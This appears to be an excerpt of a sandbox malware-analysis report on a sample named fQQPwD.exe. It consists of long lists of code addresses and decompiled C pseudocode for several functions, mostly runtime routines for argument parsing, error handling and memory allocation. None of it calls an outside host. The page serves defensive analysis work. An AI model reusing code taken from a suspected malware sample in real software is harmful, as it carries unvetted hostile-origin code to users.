0x000ba2b1
0x000ba2b7
0x000ba2b7
0x000ba2bc
0x000ba2be
0x000ba2c0
0x000ba2c2
0x000ba2c4
0x00000000
0x000ba2ca
0x000ba2ca
0x00000000
0x000ba2ca
0x000b9e56
0x000b9e59
0x000b9e6c
0x000b9e72
0x000b9e75
0x000ba595
0x000ba596
0x000ba59a
0x00000000
0x000b9e7b
0x000b9e7b
0x000b9e7f
0x000b9e83
0x000b9e86
0x000b9e8d
0x000ba5bd
0x000ba5c1
0x000ba5c5
0x000ba5c9
0x00000000
0x000b9e93
0x000b9e93
0x000b9e97
0x000b9e99
0x000ba6c1
0x000ba6c5
0x000ba6c9
0x000ba6cd
0x000ba6d4
0x000ba6d9
0x000ba6dd
0x000ba6df
0x00000000
0x000ba6e5
0x000ba6e5
0x00000000
0x000ba6e5
0x000b9e9f
0x000b9e9f
0x000b9ea3
0x000b9ea7
0x000b9ea7
0x000b9eac
0x000b9eae
0x000b9eb0
0x000b9eb2
0x000b9ec9
0x000b9ec9
0x00000000
0x000b9eb4
0x000b9eb4
0x000b9eb6
0x000b9eb8
0x000b9ebe
0x00000000
0x000b9ec4
0x000b9ec4
0x000b9ecb
0x000b9ecb
0x000b9ecf
0x000b9ed3
0x000b9ed7
0x000b9ed7
0x000b9ed9
0x000b9edb
0x000b9edb
0x000b9edf
0x000b9ee1
0x000b9ee4
0x000b9ee7
0x000ba5e4
0x000ba5e8
0x000ba5e8
0x000ba5ee
0x000ba5f1
0x000ba5f4
0x000ba5f9
0x000ba5ff
0x000ba601
0x000ba607
0x000ba607
0x000ba60c
0x000ba60e
0x000ba610
0x000ba612
0x00000000
0x000ba618
0x000ba618
0x000ba618
0x000ba61f
0x000ba624
0x000ba628
0x000ba62c
0x000ba62f
0x000ba633
0x000ba635
0x000ba637
0x000ba662
0x000ba662
0x00000000
0x000ba639
0x000ba639
0x000ba63b
0x000ba643
0x000ba649
0x00000000
0x000ba64f
0x000ba651
0x000ba657
0x00000000
0x000ba65d
0x000ba65d
0x000ba664
0x000ba664
0x000ba667
0x000ba67b
0x000ba67b
0x000ba67d
0x00000000
0x000ba67d
0x000ba657
0x000ba649
0x000ba637
0x000b9eed
0x000b9ef1
0x000b9ef1
0x00000000
0x000b9ef1
0x000b9ee7
0x000b9ebe
0x000b9eb2
0x000b9e99
0x000b9e8d
0x000b9e75
0x000b9e50
0x000b9bba
0x000b9bba
0x000b9bba
0x000b9bc2
0x000b9bc9
0x000b9bcd
0x000b9bcf
0x000ba480
0x000ba48a
0x000ba48c
0x000ba491
0x000ba494
0x000ba496
0x00000000
0x000ba49c
0x000ba49c
0x000ba49e
0x00000000
0x000ba49e
0x000b9bd5
0x000b9bd5
0x000b9bd5
0x000b9bdc
0x000b9bdc
0x000b9bde
0x000bb35b
0x000bb35c
0x000bb35e
0x000bb35e
0x000bb35f
0x00000000
0x000b9be4
0x000b9be4
0x000b9be6
0x000b9bea
0x000b9bed
0x000b9bf1
0x000b9d16
0x000b9d1b
0x000b9d1d
0x000b9d1f
0x000b9d22
0x000b9d22
0x000b9d22
0x000b9d25
0x000b9d44
0x000b9d47
0x000b9d52
0x000b9bf7
0x000b9bf7
0x000b9bfa
0x000b9d60
0x000b9d65
0x000b9d67
0x000b9d69
0x000b9d6c
0x000b9d6c
0x000b9d6c
0x000b9d7d
0x000b9d89
0x000b9d8e
0x000b9d91
0x000b9d94
0x000b9da2
0x000b9db0
0x000b9c00
0x000b9c00
0x000b9c06
0x000b9c08
0x000b9c0e
0x000b9c16
0x000b9c17
0x000b9f75
0x000b9c1d
0x000b9c1d
0x000b9c20
0x000b9c20
0x000b9f8d
0x000b9f8f
0x000b9f8f
0x000b9f92
0x000b9f99
0x000b9f9e
0x000b9fa0
0x000b9fa2
0x000b9fa5
0x000b9fa5
0x000b9fa5
0x000b9fb6
0x000b9fc4
0x000b9fc7
0x000b9fca
0x000b9fcd
0x000b9fdb
0x000b9fe7
0x000b9fe7
0x000b9fe9
0x000b9fed
0x000b9fed
0x000b9bfa
0x000b9fef
0x000b9ff4
0x000b9ffc
0x000ba000
0x000ba003
0x000ba006
0x000ba4d9
0x000ba4e0
0x000ba4e2
0x000ba4e8
0x000ba4ed
0x000ba4ed
0x000ba4e2
0x000ba00c
0x000ba010
0x000ba014
0x000ba2d8
0x000ba2de
0x000ba2e1
0x000ba2e4
0x000ba2e9
0x000ba2ef
0x000ba2f1
0x000ba2f7
0x000ba2f7
0x000ba2fc
0x000ba2fe
0x000ba300
0x000ba302
0x000ba304
0x00000000
0x000ba30a
0x000ba30a
0x00000000
0x000ba30a
0x000ba01a
0x000ba029
0x000ba02f
0x000ba032
0x000ba5b1
0x000ba5b2
0x000ba5b3
0x00000000
0x000ba038
0x000ba038
0x000ba03c
0x000ba040
0x000ba044
0x000ba047
0x000ba04e
0x000ba5cf
0x000ba5d3
0x000ba5d7
0x000ba5db
0x00000000
0x000ba054
0x000ba054
0x000ba058
0x000ba05a
0x000ba7cc
0x000ba7d0
0x000ba7d4
0x000ba7d8
0x000ba7df
0x000ba7e4
0x000ba7e8
0x000ba7ea
0x00000000
0x000ba7f0
0x000ba7f0
0x00000000
0x000ba7f0
0x000ba060
0x000ba060
0x000ba064
0x000ba068
0x000ba068
0x000ba06d
0x000ba06f
0x000ba071
0x000ba073
0x000ba08a
0x000ba08a
0x00000000
0x000ba075
0x000ba075
0x000ba077
0x000ba079
0x000ba07f
0x000ba453
0x000ba453
0x000ba457
0x000ba45d
0x000ba46b
0x000ba470
0x000ba471
0x000ba476
0x000ba479
0x000ba47b
0x00000000
0x000ba085
0x000ba085
0x000ba08c
0x000ba08c
0x000ba090
0x000ba094
0x000ba098
0x000ba098
0x000ba09a
0x000ba09d
0x000ba09f
0x000ba09f
0x000ba0a3
0x000ba0a5
0x000ba0a8
0x000ba6ee
0x000ba6f3
0x000ba6f3
0x000ba6f9
0x000ba6fc
0x000ba6ff
0x000ba704
0x000ba70a
0x000ba70c
0x000ba712
0x000ba712
0x000ba717
0x000ba719
0x000ba71b
0x000ba71d
0x000bb17a
0x000bb17e
0x000bb180
0x000bb191
0x000bb196
0x000bb19a
0x000bb19c
0x000bb338
0x000bb33e
0x000bb340
0x000bb343
0x00000000
0x000bb1a2
0x000bb1c7
0x000bb1c9
0x000bb1cf
0x000bb1d6
0x000bb353
0x000bb1dc
0x000bb1df
0x000bb1df
0x000bb1df
0x000bb1e8
0x000bb1eb
0x00000000
0x000bb1eb
0x000ba723
0x000ba723
0x000ba723
0x000ba72a
0x000ba72f
0x000ba733
0x000ba737
0x000ba73a
0x000ba73e
0x000ba740
0x000ba742
0x000ba76d
0x000ba76d
0x00000000
0x000ba744
0x000ba744
0x000ba746
0x000ba74e
0x000ba754
0x000bac87
0x000bac87
0x000bac8b
0x000bac91
0x000bac9f
0x000baca4
0x000baca5
0x000bacaa
0x000bacad
0x000bacb1
0x000bacb6
0x000bacbe
0x000bacc0
0x000bacc7
0x000bacca
0x000baccc
0x000ba169
0x000ba169
0x000ba16b
0x000bad15
0x000ba171
0x000ba171
0x000ba171
0x000ba173
0x000ba176
0x000ba178
0x000bb361
0x000bb361
0x000bb362
0x000bb364
0x000bb364
0x000bb365
0x000bb367
0x000bb36b
0x000bb371
0x000ba17e
0x000ba17e
0x000ba182
0x000ba185
0x000ba189
0x000ba18b
0x000ba3b8
0x000ba3bd
0x000ba3bf
0x000ba3c1
0x000ba3c4
0x000ba3c4
0x000ba3c4
0x000ba3c7
0x000ba3e6
0x000ba3e9
0x000ba3ec
0x000ba191
0x000ba191
0x000ba194
0x000ba3fe
0x000ba403
0x000ba405
0x000ba407
0x000ba40a
0x000ba40a
0x000ba40a
0x000ba41b
0x000ba427
0x000ba42c
0x000ba42f
0x000ba432
0x000ba440
0x000ba44c
0x000ba19a
0x000ba19a
0x000ba1a0
0x000ba1a2
0x000ba1a8
0x000ba1b0
0x000ba1b1
0x000ba9f4
0x000ba1b7
0x000ba1b7
0x000ba1ba
0x000ba1ba
0x000baa0c
0x000baa10
0x000baa10
0x000baa18
0x000baa1d
0x000baa1f
0x000baa21
0x000baa24
0x000baa24
0x000baa24
0x000baa35
0x000baa43
0x000baa46
0x000baa49
0x000baa4c
0x000baa5a
0x000baa66
0x000baa66
0x000baa66
0x000ba194
0x000baa68
0x000baa6d
0x000baa75
0x000baa77
0x000baa7a
0x000baa7e
0x000baa80
0x000bad1f
0x000bad26
0x000bad28
0x000bad30
0x000bad30
0x000bad28
0x000baa86
0x000baa8a
0x000babfe
0x000bac04
0x000bac07
0x000bac0b
0x000bac0e
0x000bac13
0x000bac19
0x000bac1b
0x000bac21
0x000bac21
0x000bac26
0x000bac28
0x000bac2a
0x000bac2e
0x000bac30
0x00000000
0x000bac36
0x000bac36
0x000bac3d
0x000bac42
0x000bac48
0x000bac4f
0x000bac51
0x000bac53
0x000bafa7
0x00000000
0x000bac59
0x000bac59
0x000bac5b
0x000bac63
0x000bac69
0x000bb2df
0x000bb2df
0x000bb2e3
0x000bb2e9
0x000bb2ed
0x000bb2ef
0x000bb2f1
0x000bb0ba
0x000bb0ba
0x000bb0bf
0x000bb0c4
0x00000000
0x000bac6f
0x000bac71
0x000bac77
0x00000000
0x000bac7d
0x000bac7d
0x000bac80
0x00000000
0x000bac80
0x000bac77
0x000bac69
0x000bac53
0x000baa90
0x000baa9f
0x000baaa5
0x000baaa8
0x000baaac
0x000bade5
0x000badec
0x000baded
0x000badee
0x000badf3
0x000badf5
0x00000000
0x000baab2
0x000baab2
0x000baab6
0x000baaba
0x000baabd
0x000baac4
0x000bae12
0x000bae14
0x000bae18
0x000bae1c
0x000bae20
0x00000000
0x000baaca
0x000baaca
0x000baace
0x000baad0
0x000baf72
0x000baf76
0x000baf7a
0x000baf7e
0x000baf85
0x000baf87
0x000baf8c
0x000baf8e
0x000baf92
0x000baf94
0x00000000
0x000baf9a
0x00000000
0x000baf9a
0x000baad6
0x000baad6
0x000baada
0x000baade
0x000baade
0x000baae3
0x000baae7
0x000baae9
0x000baaeb
0x000bab02
0x000bab02
0x00000000
0x000baaed
0x000baaed
0x000baaef
0x000baaf1
0x000baaf7
0x000bb0d4
0x000bb0d4
0x000bb0d8
0x000bb0de
0x000bb0ec
0x000bb0f1
0x000bb0f2
0x000bb0f7
0x000bb0fc
0x000bb101
0x000bb101
0x000bb105
0x000bb107
0x000bb118
0x000bb11d
0x000bb121
0x000bb123
0x000bb31e
0x000bb324
0x000bb326
0x000bb329
0x000bb129
0x000bb14e
0x000bb150
0x000bb156
0x000bb15d
0x000bb34b
0x000bb163
0x000bb166
0x000bb166
0x000bb166
0x000bb16f
0x000bb172
0x000ba680
0x000ba683
0x000ba68d
0x000ba690
0x000ba696
0x000ba69c
0x000ba69e
0x000ba6a1
0x000ba6ab
0x000ba6b1
0x000ba6b5
0x000ba6b8
0x000b9ef4
0x000b9ef7
0x000b9ef9
0x000b9efc
0x000ba4f6
0x000ba4fb
0x000ba507
0x000ba50e
0x000ba512
0x000ba515
0x000ba515
0x000ba4fb
0x000b9f02
0x000b9f06
0x000b9f09
0x000b9f0b
0x000b9f10
0x000ba7f9
0x000ba800
0x000ba80d
0x000ba812
0x000b9f16
0x000b9f16
0x000b9f18
0x000b9f18
0x000b9f18
0x000b9f1b
0x000b9f21
0x000b9f21
0x000b9f23
0x000b9f28
0x000b9f2e
0x000b9f30
0x000b9f33
0x000b9f3c
0x000b9f45
0x000b9f56
0x000b9f5b
0x000b9f65
0x000b9f65
0x000b9f6d
0x000b9f6d
0x000b9f28
0x00000000
0x000baafd
0x000baafd
0x000bab04
0x000bab04
0x000bab08
0x000bab0c
0x000bab10
0x000bab10
0x000bab12
0x000bab12
0x000bab16
0x000bab18
0x000bab1b
0x000baee4
0x000baee6
0x000baeeb
0x000baeeb
0x000baef1
0x000baef4
0x000baef8
0x000baefb
0x000baf00
0x000baf06
0x000baf08
0x000baf0e
0x000baf0e
0x000baf13
0x000baf15
0x000baf17
0x000baf1b
0x000baf1d
0x000bb269
0x000bb280
0x000bb285
0x000bb289
0x000bb28b
0x000bb384
0x000bb38a
0x000bb291
0x000bb2b6
0x000bb2b8
0x000bb2be
0x000bb2c5
0x000bb391
0x000bb2cb
0x000bb2ce
0x000bb2ce
0x000bb2ce
0x000bb2d7
0x00000000
0x000bb2d7
0x00000000
0x000baf23
0x000baf23
0x000baf2a
0x000baf2f
0x000baf35
0x000baf3c
0x000baf3e
0x000baf40
0x000bb009
0x00000000
0x000baf46
0x000baf46
0x000baf48
0x000baf50
0x000baf56
0x000bb2f7
0x000bb2f7
0x000bb2fb
0x000bb301
0x000bb30f
0x000bb314
0x000bb0c5
0x000bb0c5
0x000bb0ca
0x000bb0cf
0x00000000
0x000baf5c
0x000baf5e
0x000baf64
0x00000000
0x000baf6a
0x000baf6a
0x000bb00b
0x000bb00b
0x000bb00d
0x000bb01f
0x000bb01f
0x000bb021
0x000bb024
0x000bb027
0x000bb031
0x000bb034
0x000bb03a
0x000bb03e
0x000bb044
0x000bb046
0x000bb049
0x000bb053
0x000bb059
0x000bb05b
0x000bb05e
0x00000000
0x000bb05e
0x000baf64
0x000baf56
0x000baf40
0x000bab21
0x000bab25
0x000bab25
0x000bab28
0x000bab2b
0x000bab2d
0x000bab2f
0x000bad60
0x000bad65
0x000bad6f
0x000bad71
0x000bad73
0x000bad7c
0x000bad7c
0x000bad65
0x000bab35
0x000bab39
0x000bab3b
0x000bab41
0x000bb08e
0x000bb09b
0x000bab47
0x000bab47
0x000bab47
0x000bab4a
0x000bab4a
0x000bab50
0x000bab55
0x000bad86
0x000bad89
0x000bad92
0x000bad9c
0x000badac
0x000badb1
0x000badb7
0x000badb7
0x000bad92
0x000bab5b
0x000bab5b
0x000bab5f
0x000bab64
0x00000000
0x000bab6a
0x000bab64
0x000bab1b
0x000baaf7
0x000baaeb
0x000baad0
0x000baac4
0x000baaac
0x000baa8a
0x000bacd2
0x000bacd2
0x000bacd6
0x000bacd6
0x000bacd9
0x000bacdc
0x000bacdd
0x000bace5
0x000bace5
0x000ba75a
0x000ba75c
0x000ba762
0x00000000
0x000ba768
0x000ba768
0x000ba76f
0x000ba76f
0x000ba772
0x000ba786
0x000ba786
0x000ba788
0x000ba78b
0x000ba78e
0x000ba798
0x000ba79b
0x000ba7a1
0x000ba7a7
0x000ba7a9
0x000ba7ac
0x000ba7b6
0x000ba7bc
0x000ba7c0
0x000ba7c3
0x00000000
0x000ba7c3
0x000ba762
0x000ba754
0x000ba742
0x000ba0ae
0x000ba0b2
0x000ba0b2
0x000ba0b5
0x000ba0b8
0x000ba0ba
0x000ba0bd
0x000ba51d
0x000ba522
0x000ba52e
0x000ba530
0x000ba534
0x000ba539
0x000ba53d
0x000ba541
0x000ba545
0x000ba545
0x000ba522
0x000ba0c3
0x000ba0c7
0x000ba0ca
0x000ba0cc
0x000ba0d1
0x000ba822
0x000ba826
0x000ba839
0x000ba83e
0x000ba0d7
0x000ba0d7
0x000ba0d9
0x000ba0d9
0x000ba0d9
0x000ba0dc
0x000ba0e2
0x000ba0e2
0x000ba0e4
0x000ba0e9
0x000ba54d
0x000ba54f
0x000ba552
0x000ba55b
0x000ba55f
0x000ba576
0x000ba57c
0x000ba57c
0x000ba584
0x000ba587
0x000ba587
0x000ba587
0x000ba0ef
0x000ba0f3
0x000ba0f8
0x000ba4a2
0x000ba4a2
0x000ba4a5
0x000ba4a6
0x000ba4a9
0x000ba4b0
0x000ba4b3
0x000ba4b3
0x000ba0fe
0x000ba0fe
0x000ba100
0x000ba123
0x000ba125
0x000ba128
0x00000000
0x00000000
0x000ba102
0x000ba102
0x000ba106
0x000ba10e
0x000ba117
0x000ba11f
0x000ba11f
0x000ba100
0x000ba0a8
0x000ba07f
0x000ba073
0x000ba05a
0x000ba04e
0x000ba032
0x000ba014
0x000b9bde
0x000b9bcf
0x000b9bb8
0x000b9bac
0x000b9b8d
0x000b9aeb
0x000b9aeb
0x000b9aed
0x000b9af0
0x000b9af6
0x000b9af6
0x000b9af7
0x00000000
0x000b9af7
0x000b9af0
0x000b9ae9
0x000b9add
0x000ba132
0x000ba134
0x000ba142
0x000b99bd
0x000b99bd
0x000b99c1
0x000b99c2
0x000b99c7
0x000b99ca
0x000b99d1
0x000b99d3
0x000b99d7
0x000b99e2
0x000b9a42
0x000b9a46
0x000b9a4a
0x000b9a4e
0x00000000
0x000b99e4
0x000b99e4
0x000b99ed
0x000b9a54
0x000b9a58
0x000b9a5c
0x000b9a60
0x000b9a67
0x000b9a6c
0x000b9a70
0x000b9a72
0x00000000
0x000b9a74
0x00000000
0x000b9a74
0x000b99ef
0x000b99ef
0x000b99f3
0x000b99f7
0x000b99f7
0x000b99fc
0x000b9a00
0x000b9a13
0x000b9a13
0x000b9a15
0x000b9a15
0x000b9a19
0x000b9a20
0x000b9a27
0x000b9a29
0x00000000
0x000b9a02
0x000b9a02
0x000b9a04
0x000b9a0c
0x000b9a76
0x000b9a7a
0x000b9a7f
0x000b9a8b
0x000b9a90
0x000b9a91
0x000b9a96
0x000b9a99
0x000b9a9b
0x00000000
0x000b9a0e
0x000b9a0e
0x00000000
0x000b9a0e
0x000b9a0c
0x000b9a00
0x000b99ed
0x000b99e2
0x000b99b7
0x000b999f

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c7a59ca3016e3fb85e9129d3f6c9684eb78ddbe8453d7b4bac0b636174f801
Instruction ID: 44a2658048e8e401081159034005ed45872a92d90d267e0beeb252c23067e194
Opcode Fuzzy Hash: e5c7a59ca3016e3fb85e9129d3f6c9684eb78ddbe8453d7b4bac0b636174f801
Instruction Fuzzy Hash: F191C2316043419FD318CF28C484BAAB7E2FF8A710F19866DE9958B791D771ED45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000EC734 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E000EC734(void* __edx, intOrPtr _a4) {
				signed int _v12;
				void* _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t41;
				intOrPtr* _t42;
				WCHAR* _t46;
				intOrPtr _t51;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t62;
				intOrPtr _t65;

				_t54 = __edx;
				_pop(_t66);
				_t57 = _a4;
				if(_t57 != 0) {
					if(_t57 == 2 || _t57 == 1) {
						GetModuleFileNameW(0, 0x124250, 0x104);
						 *0x124a24 = 0x124250;
						_t46 =  *0x124a38; // 0x53c0fc8
						if(_t46 == 0 ||  *_t46 == 0) {
							_t46 = 0x124250;
						}
						_v12 = 0;
						_v20 = 0;
						_t25 = E000EC73F(L000EC8C4(_t46, 0, 0,  &_v12,  &_v20), _v12, _v20, 2); // executed
						_t62 = _t25;
						if(_t62 != 0) {
							L000EC8C4(_t46, _t62, _t62 + _v12 * 4,  &_v12,  &_v20);
							if(_t57 != 1) {
								_push( &_v16);
								_v16 = 0;
								_t58 = L000FABAB(0, _t54, _t57, _t62);
								if(_t58 == 0) {
									_t55 = _v16;
									_t51 = 0;
									_t33 = _t55;
									if( *_t55 != 0) {
										do {
											_t33 = _t33 + 4;
											_t51 = _t51 + 1;
										} while ( *_t33 != 0);
									}
									 *0x124a28 = _t51;
									_v16 = 0;
									 *0x124a30 = _t55;
									L000A29E0(0);
									_t58 = 0;
								} else {
									L000A29E0(_v16);
								}
								_v16 = 0;
								L000A29E0(_t62);
								_t36 = _t58;
							} else {
								 *0x124a30 = _t62;
								 *0x124a28 = _v12 - 1;
								goto L13;
							}
						} else {
							_t41 = E000ED2A7();
							_push(0xc);
							_pop(0);
							 *_t41 = 0;
							L13:
							L000A29E0(0);
							_t36 = 0;
						}
					} else {
						_t42 = E000ED2A7();
						_t65 = 0x16;
						 *_t42 = _t65;
						E000F709C();
						_t36 = _t65;
					}
				} else {
					_t36 = 0;
				}
				return _t36;
			}

0x000ec734
0x000ec739
0x000ec797
0x000ec79c
0x000ec7a9
0x000ec7d5
0x000ec7db
0x000ec7e1
0x000ec7e9
0x000ec7f0
0x000ec7f0
0x000ec7f8
0x000ec7ff
0x000ec813
0x000ec818
0x000ec81f
0x000ec83e
0x000ec849
0x000ec86c
0x000ec86e
0x000ec876
0x000ec87c
0x000ec888
0x000ec88b
0x000ec88d
0x000ec891
0x000ec893
0x000ec893
0x000ec896
0x000ec897
0x000ec893
0x000ec89c
0x000ec8a2
0x000ec8a5
0x000ec8ab
0x000ec8b0
0x000ec87e
0x000ec881
0x000ec881
0x000ec8b4
0x000ec8b7
0x000ec8bc
0x000ec84b
0x000ec84f
0x000ec855
0x00000000
0x000ec85a
0x000ec821
0x000ec821
0x000ec826
0x000ec828
0x000ec829
0x000ec85c
0x000ec85e
0x000ec863
0x000ec863
0x000ec7b0
0x000ec7b0
0x000ec7b7
0x000ec7b8
0x000ec7ba
0x000ec7bf
0x000ec7bf
0x000ec79e
0x000ec79e
0x000ec79e
0x000ec8c3

Strings

C:\Users\user\fQQPwD.exe, xrefs: 000EC7CC, 000EC7D3, 000EC7F0, 000EC805, 000EC83D

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID: C:\Users\user\fQQPwD.exe
API String ID: 0-4019999101
Opcode ID: 782abe36debe3f3d6c1930be6c7d4bcd70ae4dd2b770e37e193b77a31d6f715a
Instruction ID: 8538e1387e6560e35e2a96d8fbd53c7023e0a0a0cfd92ccf55aa6e4901731dc5
Opcode Fuzzy Hash: 782abe36debe3f3d6c1930be6c7d4bcd70ae4dd2b770e37e193b77a31d6f715a
Instruction Fuzzy Hash: 3241D672A04254AFEB21DF9A9EC1DEFBBB8EB44750F11006AF505B7601DB718D42DB90

Uniqueness

Uniqueness Score: -1.00%

Function 000F570B Relevance: 2.6, APIs: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E000F570B(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t5;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x120410; // 0x8
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = L000F5E43(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t5 = E000A2A60(1, 0x364); // executed
						_t23 = _t5;
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = L000F5E43(__eflags,  *0x120410, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								L000F58CC(_t23, 0x124a54);
								L000A29E0(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								L000F5E43(0,  *0x120410, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							L000F5E43(__eflags,  *0x120410, 0);
							_push(0);
							L10:
							L000A29E0();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = L000F5E04(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x120410; // 0x8
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x000f5715
0x000f5717
0x000f571c
0x000f571f
0x000f573b
0x000f573e
0x000f5743
0x000f5745
0x000f5753
0x000f5758
0x000f575c
0x000f575e
0x000f5778
0x000f577d
0x000f577f
0x000f579e
0x000f57a5
0x000f57ad
0x000f5781
0x000f5781
0x000f5781
0x000f578a
0x000f578f
0x00000000
0x000f578f
0x000f5760
0x000f5760
0x000f5769
0x000f576e
0x000f5790
0x000f5790
0x000f5795
0x000f5747
0x000f5747
0x000f5747
0x000f5721
0x000f5722
0x000f5729
0x000f5736
0x00000000
0x000f572b
0x000f572b
0x000f5730
0x000f5732
0x000f5732
0x000f5729
0x000f57b1
0x000f57bb

APIs

GetLastError.KERNEL32(?,00000008,000F29D4), ref: 000F570F
SetLastError.KERNEL32(00000000,?,?,?,000A6157,00000000), ref: 000F57B1

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 332598b1bcd79c1c0d9615e8e37c42c9a3d39c818c0e35713fa64a056f214aa4
Instruction ID: 162e1918e823e8f5add9778b1f3590caf823fc61bc0544e1fb42ac17b0724afd
Opcode Fuzzy Hash: 332598b1bcd79c1c0d9615e8e37c42c9a3d39c818c0e35713fa64a056f214aa4
Instruction Fuzzy Hash: 88110831308B1CBED661B7B4FCC6EBB268C9B057AAB104230F725A1CE3DB505D457160

Uniqueness

Uniqueness Score: -1.00%

Function 000BC220 Relevance: 2.5, APIs: 2, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000BC220(void* _a4, long _a8, signed int _a12) {
				void* _t8;
				signed int _t9;
				long _t11;
				long _t12;
				signed int _t14;

				_t14 = _a12;
				_t11 = _a8;
				_t8 = _a4;
				if(_t14 > 6) {
					_t12 = 1;
					goto L6;
				} else {
					switch( *((intOrPtr*)(_t14 * 4 +  &M001164FC))) {
						case 0:
							__eax = VirtualFree(__eax, __ecx, 0x4000);
							goto L7;
						case 1:
							L6:
							_t9 = VirtualAlloc(_t8, _t11, 0x1000, _t12); // executed
							goto L7;
						case 2:
							_t12 = 4;
							goto L6;
						case 3:
							goto L6;
						case 4:
							goto L6;
					}
				}
				L7:
				return _t9 & 0xffffff00 | _t9 != 0x00000000;
			}

0x000bc224
0x000bc227
0x000bc22a
0x000bc230
0x000bc24c
0x00000000
0x000bc232
0x000bc237
0x00000000
0x000bc275
0x00000000
0x00000000
0x000bc258
0x000bc260
0x00000000
0x00000000
0x000bc23e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000bc237
0x000bc266
0x000bc26d

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,?,?,000A6157,00000000), ref: 000BC260
VirtualFree.KERNEL32(00000040,?,00004000,?,000A6157,00000000), ref: 000BC275

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
